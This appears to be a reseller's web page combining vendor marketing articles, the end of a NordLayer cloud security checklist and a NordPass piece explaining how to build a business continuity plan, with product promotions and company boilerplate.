8. Track threats and log incidents. Use automated threat scanning and activity logging. Cloud logging tools can organize and analyze complex data. Use this data to improve your security posture and provide evidence of compliance.
9. Apply data security policies. Put in place policies to encrypt data at rest, in transit, and in use. Check encryption keys are used safely, preventing exposure to external attackers.
How can NordLayer help?
Follow our cloud application security checklist and best practices to secure cloud environments. With the correct controls, enterprises can take advantage of cloud computing. Sound app security measures reduce costs and cut data loss risks.
NordLayer offers cloud security solutions for all digital businesses. Install IAM, MFA, and SSO to control cloud access and reduce the attack surface. Create encrypted connections between remote workers and cloud portals. And integrate client-side security controls with tools provided by CSPs.
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.
Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
These days, cybercrime is rampant. It’s no longer a matter of “if” you’re going to suffer an attack but “when” it will happen. All companies want to be ready for any crisis. And this is where a business continuity plan comes into play.
But what is a business continuity plan exactly? Why is it important? What should one include? Today, we’re exploring all these questions in-depth.
What is a business continuity plan?
A business continuity plan (BCP) is a document that sets guidelines for how an organization will continue its operations in the event of a disruption, whether it’s a fire, flood, other natural disaster or a cybersecurity incident. A BCP aims to help organizations resume operations without significant downtime.
Unfortunately, according to a 2020 Mercer survey, 51% of businesses across the globe don’t have a business continuity plan in place.
What’s the difference between business continuity and disaster recovery plans?
We often confuse the terms business continuity plan and disaster recovery plan. The two overlap and often work together, but the disaster recovery plan focuses on containing, examining, and restoring operations after a cyber incident. On the other hand, BCP is a broader concept that considers the whole organization. A business continuity plan helps organizations stay prepared for dealing with a potential crisis and usually encompasses a disaster recovery plan.
Importance of business continuity planning
The number of news headlines announcing data breaches has numbed us to the fact that cybercrime is very real and frequent and poses an existential risk to companies of all sizes and industries.
Consider that in 2021, approximately 37% of global organizations fell victim to a ransomware attack. Then consider that business interruption and restoration costs account for 50% of cyberattack-related losses. Finally, take into account that most cyberattacks are financially motivated and the global cost of cybercrime topped $6 trillion last year. The picture is quite clear — cybercrime is a lucrative venture for bad actors and potentially disastrous for those on the receiving end.
To thrive in these unpredictable times, organizations go beyond conventional security measures. Many companies develop a business continuity plan parallel to secure infrastructure and consider the plan a critical part of the security ecosystem. The Purpose of a business continuity plan is to significantly reduce the downtime in an emergency and, in turn, reduce the potential reputational damage and — of course — revenue losses.
The initial stage of developing a business continuity plan starts with a statement of the plan’s purpose, which explains the main objective of the plan, such as ensuring the organization’s ability to continue its operations during and after a disruptive event.
The Scope of the Plan outlines the areas or functions that the plan will cover, including business processes, personnel, equipment, and technology.
The Budget specifies the estimated financial resources required to implement and maintain the BCP. It includes costs related to technology, personnel, equipment, training, and other necessary expenses.
The Timeline provides a detailed schedule for developing, implementing, testing, and updating the BCP.
II. Risk Assessment
Identification of Risks
Prioritization of Risks
Mitigation Strategies
The Risk Assessment section of a Business Continuity Plan (BCP) is an essential part of the plan that identifies potential risks that could disrupt an organization’s critical functions.
The Identification of Risks involves identifying potential threats to the organization, such cybersecurity breaches, supply chain disruptions, power outages, and other potential risks. This step is critical to understand the risks and their potential impact on the organization.
Once the risks have been identified, the Prioritization of Risks follows, which helps determine which risks require the most attention and resources.
The final step in the Risk Assessment section is developing Mitigation Strategies to minimize the impact of identified risks. Mitigation strategies may include preventative measures, such as system redundancies, data backups, cybersecurity measures, as well as response and recovery measures, such as emergency protocols and employee training.
III. Emergency Response
Emergency Response Team
Communication Plan
Emergency Procedures
This section of the plan focuses on immediate actions that should be taken to ensure the safety and well-being of employees and minimize the impact of the event on the organization’s operations.
The Emergency Response Team is responsible for managing the response to an emergency or disaster situation. This team should be composed of individuals who are trained in emergency response procedures and can act quickly and decisively during an emergency. The team should also include a designated leader who is responsible for coordinating the emergency response efforts.
The Communication Plan outlines how information will be disseminated during an emergency situation. It includes contact information for employees, stakeholders, and emergency response personnel, as well as protocols for communicating with these individuals.
The Emergency Procedures detail the steps that should be taken during an emergency or disaster situation. The emergency procedures should be developed based on the potential risks identified in the Risk Assessment section and should be tested regularly to ensure that they are effective.
IV. Business Impact Analysis
The Business Impact Analysis (BIA) section of a Business Continuity Plan (BCP) is a critical step in identifying the potential impact of a disruption to an organization’s critical operations.
The Business Impact Analysis is typically conducted by a team of individuals who understand the organization’s critical functions and can assess the potential impact of a disruption to those functions. The team may include representatives from various departments, including finance, operations, IT, and human resources.
V. Recovery and Restoration
Procedures for recovery and restoration of critical processes
Prioritization of recovery efforts
Establishment of recovery time objectives
The Recovery and Restoration section of a Business Continuity Plan (BCP) outlines the procedures for recovering and restoring critical processes and functions following a disruption.
The Procedures for recovery and restoration of critical processes describe the steps required to restore critical processes and functions following a disruption. This may include steps such as relocating to alternate facilities, restoring data and systems, and re-establishing key business relationships.
The Prioritization section of the plan identifies the order in which critical processes will be restored, based on their importance to the organization’s operations and overall mission.
Recovery time objectives (RTOs) define the maximum amount of time that critical processes and functions can be unavailable following a disruption. Establishing RTOs ensures that recovery efforts are focused on restoring critical functions within a specific timeframe.
VI. Plan Activation
Plan Activation Procedures
The Plan Activation section is critical in ensuring that an organization can quickly and effectively activate the plan and respond to a potential emergency.
The Plan Activation Procedures describe the steps required to activate the BCP in response to a disruption. The procedures should be clear and concise, with specific instructions for each step to ensure a prompt and effective response.
VII. Testing and Maintenance
Testing Procedures
Maintenance Procedures
Review and Update Procedures
This section of the plan is critical to ensure that an organization can effectively respond to disruptions and quickly resume its essential functions.
Testing procedures may include scenarios such as natural disasters, cyber-attacks, and other potential risks. The testing procedures should include clear objectives, testing scenarios, roles and responsibilities, and evaluation criteria to assess the effectiveness of the plan.
The Maintenance Procedures detail the steps necessary to keep the BCP up-to-date and relevant.
The Review and Update Procedures describe how the BCP will be reviewed and updated regularly to ensure its continued effectiveness. This may involve conducting a review of the plan on a regular basis or after significant changes to the organization’s operations or threats.
What should a business continuity plan checklist include?
Organizations looking to develop a BCP have more than a few things to think through and consider. Variables such as the size of the organization, its IT infrastructure, personnel, and resources all play a significant role in developing a continuity plan. Remember, each crisis is different, and each organization will have a view on handling it according to all the variables in play. However, all business continuity plans will include a few elements in one way or another.
Clearly defined areas of responsibility
A BCP should define specific roles and responsibilities for cases of emergency. Detail who is responsible for what tasks and clarify what course of action a person in a specific position should take. Clearly defined roles and responsibilities in an emergency event allow you to act quickly and decisively and minimize potential damage.
Crisis communication plan
In an emergency, communication is vital. It is the determining factor when it comes to crisis handling. For communication to be effective, it is critical to establish clear communication pipelines. Furthermore, it is crucial to understand that alternative communication channels should not be overlooked and outlined in a business continuity plan.
Recovery teams
A recovery team is a collective of different professionals who ensure that business operations are restored as soon as possible after the organization confronts a crisis.
Alternative site of operations
Today, when we think of an incident in a business environment, we usually think of something related to cybersecurity. However, as discussed earlier, a BCP covers many possible disasters. In a natural disaster, determine potential alternate sites where the company could continue to operate.
Backup power and data backups
Whether a cyber event or a real-life physical event, ensuring that you have access to power is crucial if you wish to continue operations. In a BCP, you can often come across lists of alternative power sources such as generators, where such tools are located, and who should oversee them. The same applies to data. Regularly scheduled data backups can significantly reduce potential losses incurred by a crisis event.
Recovery guidelines
If a crisis is significant, a comprehensive business continuity plan usually includes detailed guidelines on how the recovery process will be carried out.
Business continuity planning steps
Here are some general guidelines that an organization looking to develop a BCP should consider:
Analysis
A business continuity plan should include an in-depth analysis of everything that could negatively affect the overall organizational infrastructure and operations. Assessing different levels of risk should also be a part of the analysis phase.
Design and development
Once you have a clear overview of potential risks your company could face, start developing a plan. Create a draft and reassess it to see if it takes into account even the smallest of details.
Implementation
Implement BCP within the organization by providing training sessions for the staff to get familiar with the plan. Getting everyone on the same page regarding crisis management is critical.
Testing
Rigorously test the plan. Play out a variety of scenarios in training sessions to learn the overall effectiveness of the continuity plan. By doing so, everyone on the team will be closely familiar with the business continuity plan’s guidelines.
Maintenance and updating
Because the threat landscape constantly changes and evolves, you should regularly reassess your BCP and take steps to update it. By making your continuity plan in tune with the times, you will be able to stay a step ahead of a crisis.
Level up your company’s security with NordPass Business
A comprehensive business continuity plan is vital for the entire organization’s security posture. However, in a perfect world, you wouldn’t have to use it. This is where NordPass Business can help.
Remember, weak, reused, or compromised passwords are often cited as one of the top contributing factors in data breaches. It’s not surprising, considering that an average user has around 100 passwords. Password fatigue is real and significantly affects how people treat their credentials. NordPass Business counters these issues.
With NordPass Business, your team will have a single secure place to store all work-related passwords, credit cards, and other sensitive information. Accessing all the data stored in NordPass is quick and easy, which allows your employees not to be distracted by the task of finding the correct passwords for the correct account.
In cyber incidents, NordPass Business ensures that company credentials remain secure at all times. Everything stored in the NordPass vault is secured with advanced encryption algorithms, which would take hundreds of years to brute force.
If you are interested in learning more about NordPass Business and how it can fortify corporate security, do not hesitate to book a demo with our representative.
About Version 2 Digital
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.
Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
About NordPass NordPass is developed by Nord Security, a company leading the global market of cybersecurity products.
The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.
